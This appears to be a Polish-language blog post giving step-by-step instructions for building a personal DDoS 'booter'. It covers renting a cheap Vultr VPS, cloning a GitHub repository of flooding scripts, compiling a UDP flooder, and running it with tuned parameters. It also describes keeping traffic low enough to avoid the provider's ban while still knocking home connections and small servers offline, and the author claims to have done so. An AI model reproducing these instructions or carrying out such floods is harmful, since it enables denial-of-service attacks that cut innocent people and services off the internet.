Jak zrobić własny Booter za cenę, która jest tego warta.

Pozdrowienia, dzisiaj powiem wam jak można zrobić booter dla połączeń domowych.
Uwaga boczna :to nie jest przewodnik dla bootera 300 + Gbps. Jest wystarczająco silny, aby łatwo dotrzeć do 98.9% połączeń domowych i małych/niezabezpieczonych serwerów w trybie offline.
zauważ również, że nie jest to coś, co możesz zrobić za darmo. Jest to jednak najtańsza metoda, jaką znam bez użycia szczurów lub skompromitowanych serwerów.
zalety tego nad booterami:
możesz trafić każdego na dowolną ilość czasu.
możesz dodać własne metody.
w razie potrzeby możesz zwiększyć moc.
wady:
zajmuje więcej czasu niż zakup usługi rozruchowej.
wymaga minimalnej wiedzy technicznej.
wymaga pewnych konfiguracji i testów.
więc jeśli nadal jesteś zainteresowany, zacznijmy.
po pierwsze: przejdź do Vultr i zarejestruj konto. To dość proste i nie oczekuję, że potrzebujesz pomocy.
po drugie: załaduj trochę $$$ na stronę. (Karta kredytowa, PayPal)
Po Trzecie: przejdź do serwerów. Naciśnij „Deploy Server” Wybierz lokalizację, która najbardziej Ci odpowiada. (Najbliżej Ciebie / Twojego celu.
czwarty: Ustaw typ serwera na x64 CentOS (lub jakikolwiek Najnowszy jest w momencie czytania.)
Po piąte: Ustaw rozmiar serwera na $ 3.50 / miesiąc. (Nazwij mnie booterem, który ma plan $3.50 i nie jest oszustwem)
po szóste: wprowadź nazwę hosta i wybraną etykietę.
teraz wciśnij „Deploy Now”!
poczekaj na wdrożenie serwera, a następnie kliknij go na liście serwerów.
powinieneś zobaczyć informacje o swoim serwerze, w tym nazwę użytkownika i hasło.
nazwa użytkownika będzie „root”
hasło będzie jakimś losowym gównem
Połącz się z serwerem przez SSH. (Jeśli nie wiesz, jak korzystać z SSH, po prostu go wygoogluj.)
Zaloguj się jako root za pomocą hasła.
teraz musimy wprowadzić kilka poleceń jeden po drugim i czekać na ich zakończenie.

Kod:
yum install git -y
yum install gcc -y

teraz potrzebujemy naszych skryptów DoS.
na szczęście Github istnieje.
Użyj następującego polecenia, aby uzyskać Skrypty.

Kod:
git clone https://github.com/vbooter/DDoS-Scripts

teraz cd do katalogu.

Kod:
cd DDoS-Scripts/

jeśli zrobisz szybkie ls zobaczysz metody, które zostały pobrane.

Kod:
# ls
50x.c README.md SLOWLORIS.c SUDP2.c TCP.c UDP.c
ARME.c RUDY.c SSYN2.c SUDP.c TCP Shell.php UDP Shell.php

w celu nawiązania połączeń domowych. Skupmy się na UDP.c
skompilujmy skrypt. Robimy to za pomocą następującego polecenia.

Kod:
gcc UDP.c -pthread -o UDP

teraz powinniśmy mieć program o nazwie UDP w naszym katalogu. Jeśli go wykonamy ./ UDP zobaczymy co następuje.

Kod:
UDP Flooder v1.2.8 FINAL by ohnoes1479
Usage: ./UDP <target IP/hostname> <port to be flooded> <throttle (lower is faster)> <packet size> <number threads to use> <time (optional)>

nasz booter jest gotowy, ale Vultr zbanuje nasz VPS, jeśli zrobimy to jak idioci.
sztuką, aby nie zostać zbanowanym, jest utrzymanie ruchu na tyle niskiego, aby nie być zbyt podejrzanym, ale wystarczająco wysokiego, aby trafić w cel offline.
zrobilem Mala konfiguracje i komendę ktorej uzywam jest:

Kod:
./UDP <target IP/hostname> <port to be flooded> 100 150 1 <time (optional)>

to daje mi około 70Mbps. Łatwo zdejmując wszystkie połączenia domowe, na których go testowałem.

to wszystko, bądź bezpieczny i nie płać ludziom za sloty botnetów lub bootery.
jeśli masz jakieś pytania, śmiało pytaj.

Leave a Reply

Twój adres e-mail nie zostanie opublikowany.